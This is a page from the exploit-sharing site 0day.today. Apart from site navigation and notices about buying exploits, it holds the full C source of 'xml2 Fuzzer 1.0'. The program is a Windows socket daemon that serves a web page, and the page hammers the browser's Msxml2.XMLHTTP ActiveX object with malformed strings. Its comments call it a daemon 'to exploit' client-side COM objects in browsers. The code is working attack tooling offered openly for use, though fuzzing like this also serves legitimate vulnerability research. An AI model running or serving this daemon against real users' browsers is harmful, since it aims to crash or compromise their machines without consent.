0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
xml2 Fuzzer 1.0 exploit
[/*
xml2 fuzz ver 1.0
--
C:\x90c\xml2_fuzz> ./xml_fuzz
___ ___
/ _ \ / _ \
__ __| (_) || | | | ___
\ \/ / __. || | | | / __|
> < / / | |_| || (__
/_/\_\ /_/ \___/ \___|
xml2 fuzzer ver 1.0
./xml2_fuzz
xml2 fuzz: listen fuzz daemon [9090/tcp]
--
[Description]:
It's a fuzz daemon to exploit
to com object of client side in
web browser
(1) xml2 fuzz daemon listen
(2) web browser open url of the fuzz daemon
(3) the url request to xml2 COM object with fuzz str
for instance, AAAA fuzz, numeric fuzz
target program is libxml2, msxml2 com object
note)
Include "stdafx.h" for win32 and add wsock32.lib
to link option. I did compile test for it
x90c
*/
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#define FUZZ_DAEMON_PORT (9090)
/*
fuzz type
*/
#define AAAA_FUZZ (1)
#define NUMERIC_FUZZ (2)
static char http_res[65535];
static char fuzz_str[65535];
static unsigned int fuzz_int;
static int fuzz_int_neg;
void set_fuzz_str(char *mal_str);
static char fmt_fuzz_str[] = {
"HTTP/1.1 200 OK\n"
"Content-Type: text/html\n"
"Date: Sat Aug 28 1976 09:15:00 GMT\n"
"Expires: Sat Aug 28 1976 09:15:00 GMT\n"
"Cache-Control: no-cache, must-revalidate\n"
"Pragma: no-cache\n"
"Accept-Ranges: bytes\n"
"Content-Length: %d\r\n\r\n"
"\n<script>\n"
" function xml2_exploit() {\n"
" var request_url = location.protocol + '//' + location.host + '/'\n"
" var xml_http_request = new ActiveXObject('Msxml2.XMLHTTP.3.0');\n"
" xml_http_request.open(%s, request_url, false);\n"
" xml_http_request.send();\n"
" setTimeout(xml2_exploit, 1);\n"
" }\n"
" xml2_exploit();\n"
"</script>\n"
"\r\n\r\n"
};
int fuzz_start(int fuzz_type) {
int srv_sockfd = 0, cld_sockfd = 0;
struct sockaddr_in srv_addr, cld_addr;
int cld_addr_len = sizeof(struct sockaddr);
char recv_buf[1024];
WSADATA wsaData;
int mal_index = 0;
int cnt_aaaa=1;
WSAStartup(0x202, &wsaData);
memset(&srv_addr, 0, sizeof(struct sockaddr_in));
srv_addr.sin_family = AF_INET;
srv_addr.sin_addr.s_addr = INADDR_ANY;
srv_addr.sin_port = htons(FUZZ_DAEMON_PORT);
if((srv_sockfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) <= 0)
return -1;
if(bind(srv_sockfd, (struct sockaddr *)&srv_addr, sizeof(struct sockaddr)) < 0){
closesocket(srv_sockfd);
return -2;
}
if(listen(srv_sockfd, 1) < 0){
closesocket(srv_sockfd);
return -3;
}
memset(fuzz_str, 0, sizeof fuzz_str);
fuzz_str[0] = 'A';
set_fuzz_str(fuzz_str);
fuzz_int = 0x0;
fuzz_int_neg = 0;
printf("xml2 fuzz: listen fuzz daemon [%d/tcp] \n", FUZZ_DAEMON_PORT);
accept_again:
if((cld_sockfd = accept(srv_sockfd, (struct sockaddr *)&cld_addr, &cld_addr_len)) == -1){
closesocket(srv_sockfd);
return -4;
}
memset(&recv_buf, 0, sizeof(recv_buf));
recv_again:
if(recv(cld_sockfd, &recv_buf[0], sizeof(recv_buf) - 1, 0) <= 0)
goto recv_again;
printf("recv data: %s\n", recv_buf);
if(strstr(&recv_buf[0], "GET / HTTP/1.1") != NULL)
{
printf("HTTP response 200\n");
send(cld_sockfd, &http_res[0], strlen(http_res), 0);
closesocket(cld_sockfd);
memset(fuzz_str, 0, sizeof fuzz_str);
switch(fuzz_type){
case AAAA_FUZZ: // AAAAAAAA... fuzz
++cnt_aaaa;
if(cnt_aaaa == 65535)
goto fuzz_end;
memset(fuzz_str, 'A', cnt_aaaa);
set_fuzz_str(fuzz_str);
break;
case NUMERIC_FUZZ: // 0x00000000 ~ 0xffffffff, -0x00000000 ~ -0xffffffff fuzz
if(fuzz_int_neg == 0)
sprintf(fuzz_str, "%d", fuzz_int);
else if(fuzz_int_neg == 1){
if(fuzz_int >= 0xffffffff)
goto fuzz_end;
sprintf(fuzz_str, "-%d", fuzz_int);
}
set_fuzz_str(fuzz_str);
++fuzz_int;
if(fuzz_int >= 0xffffffff){
fuzz_int_neg = 1;
fuzz_int = 0x0;
}
break;
}
goto accept_again;
}
fuzz_end:
fprintf(stderr, "xml2 fuzz: fuzz end!\n");
if(srv_sockfd)
closesocket(srv_sockfd);
return 0;
}
void set_fuzz_str(char *mal_str) {
if(strlen(mal_str) > 65535-1){
printf("xml2 fuzz: too long malformed string\n");
exit(-1);
}
memset((void *)&http_res, 0, sizeof(http_res));
sprintf(http_res, fmt_fuzz_str, sizeof(http_res), mal_str);
}
static char banner[] = {
" ___ ___ \n" \
" / _ \\ / _ \\ \n" \
" __ __| (_) || | | | ___ \n" \
" \\ \\/ / \__. || | | | / __| \n" \
" > < / / | |_| || (__ \n" \
" /_/\\_\\ /_/ \\___/ \\___| \n" \
" \n" \
" xml2 fuzzer ver 1.0 \n" \
" \n" \
" ./xml2_fuzz \n" \
" \n"
};
int main() {
int ret = 0;
printf("%s", banner);
if((ret = fuzz_start(AAAA_FUZZ)) < 0)
fprintf(stderr, "xml2 fuzz: start failed!\n");
/*
if((ret = fuzz_start(NUMERIC_FUZZ)) < 0)
fprintf(stderr, "xml2 fuzz: start failed!\n");
*/
return 0;
}
# 0day.today [2024-10-06] #